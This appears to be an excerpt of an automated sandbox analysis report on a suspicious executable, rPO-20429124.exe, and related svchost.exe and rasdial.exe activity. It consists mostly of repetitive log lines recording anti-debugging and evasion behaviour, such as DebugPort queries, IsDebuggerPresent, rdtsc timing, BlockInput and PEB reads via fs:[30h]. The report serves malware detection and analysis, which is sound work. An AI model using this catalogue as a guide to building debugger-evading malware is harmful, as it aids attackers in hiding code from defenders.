Source: e2ZZ3BBL.4.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0347096E rdtsc

2_2_0347096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417863 LdrLoadDll,

2_2_00417863

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_001A3F09 BlockInput,

0_2_001A3F09

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_00133B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00133B3A

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_00165A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00165A7C

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_00134B37 LoadLibraryA,GetProcAddress,

0_2_00134B37

Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_038D3500 mov eax, dword ptr fs:[00000030h]	0_2_038D3500
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_038D34A0 mov eax, dword ptr fs:[00000030h]	0_2_038D34A0
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_038D1E70 mov eax, dword ptr fs:[00000030h]	0_2_038D1E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov ecx, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FA352 mov eax, dword ptr fs:[00000030h]	2_2_034FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D8350 mov ecx, dword ptr fs:[00000030h]	2_2_034D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D437C mov eax, dword ptr fs:[00000030h]	2_2_034D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]	2_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]	2_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]	2_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C310 mov ecx, dword ptr fs:[00000030h]	2_2_0342C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03450310 mov ecx, dword ptr fs:[00000030h]	2_2_03450310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EC3CD mov eax, dword ptr fs:[00000030h]	2_2_034EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]	2_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]	2_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]	2_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]	2_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B63C0 mov eax, dword ptr fs:[00000030h]	2_2_034B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]	2_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]	2_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]	2_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]	2_2_034D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]	2_2_034D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034663FF mov eax, dword ptr fs:[00000030h]	2_2_034663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]	2_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]	2_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]	2_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]	2_2_0345438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]	2_2_0345438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]	2_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]	2_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]	2_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B8243 mov eax, dword ptr fs:[00000030h]	2_2_034B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B8243 mov ecx, dword ptr fs:[00000030h]	2_2_034B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A250 mov eax, dword ptr fs:[00000030h]	2_2_0342A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436259 mov eax, dword ptr fs:[00000030h]	2_2_03436259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]	2_2_034EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]	2_2_034EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]	2_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]	2_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]	2_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342826B mov eax, dword ptr fs:[00000030h]	2_2_0342826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342823B mov eax, dword ptr fs:[00000030h]	2_2_0342823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]	2_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]	2_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]	2_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]	2_2_0346E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]	2_2_0346E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]	2_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]	2_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]	2_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]	2_2_034402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]	2_2_034402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov ecx, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C156 mov eax, dword ptr fs:[00000030h]	2_2_0342C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C8158 mov eax, dword ptr fs:[00000030h]	2_2_034C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]	2_2_03436154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]	2_2_03436154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118 mov ecx, dword ptr fs:[00000030h]	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F0115 mov eax, dword ptr fs:[00000030h]	2_2_034F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03460124 mov eax, dword ptr fs:[00000030h]	2_2_03460124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]	2_2_034F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]	2_2_034F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035061E5 mov eax, dword ptr fs:[00000030h]	2_2_035061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034601F8 mov eax, dword ptr fs:[00000030h]	2_2_034601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03470185 mov eax, dword ptr fs:[00000030h]	2_2_03470185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]	2_2_034EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]	2_2_034EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]	2_2_034D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]	2_2_034D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]	2_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]	2_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]	2_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]	2_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]	2_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]	2_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]	2_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03432050 mov eax, dword ptr fs:[00000030h]	2_2_03432050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6050 mov eax, dword ptr fs:[00000030h]	2_2_034B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345C073 mov eax, dword ptr fs:[00000030h]	2_2_0345C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4000 mov ecx, dword ptr fs:[00000030h]	2_2_034B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]	2_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]	2_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]	2_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]	2_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A020 mov eax, dword ptr fs:[00000030h]	2_2_0342A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C020 mov eax, dword ptr fs:[00000030h]	2_2_0342C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6030 mov eax, dword ptr fs:[00000030h]	2_2_034C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B20DE mov eax, dword ptr fs:[00000030h]	2_2_034B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0342A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034380E9 mov eax, dword ptr fs:[00000030h]	2_2_034380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B60E0 mov eax, dword ptr fs:[00000030h]	2_2_034B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0342C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034720F0 mov ecx, dword ptr fs:[00000030h]	2_2_034720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343208A mov eax, dword ptr fs:[00000030h]	2_2_0343208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C80A8 mov eax, dword ptr fs:[00000030h]	2_2_034C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F60B8 mov eax, dword ptr fs:[00000030h]	2_2_034F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_034F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346674D mov esi, dword ptr fs:[00000030h]	2_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]	2_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]	2_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430750 mov eax, dword ptr fs:[00000030h]	2_2_03430750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE75D mov eax, dword ptr fs:[00000030h]	2_2_034BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]	2_2_03472750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]	2_2_03472750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4755 mov eax, dword ptr fs:[00000030h]	2_2_034B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438770 mov eax, dword ptr fs:[00000030h]	2_2_03438770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
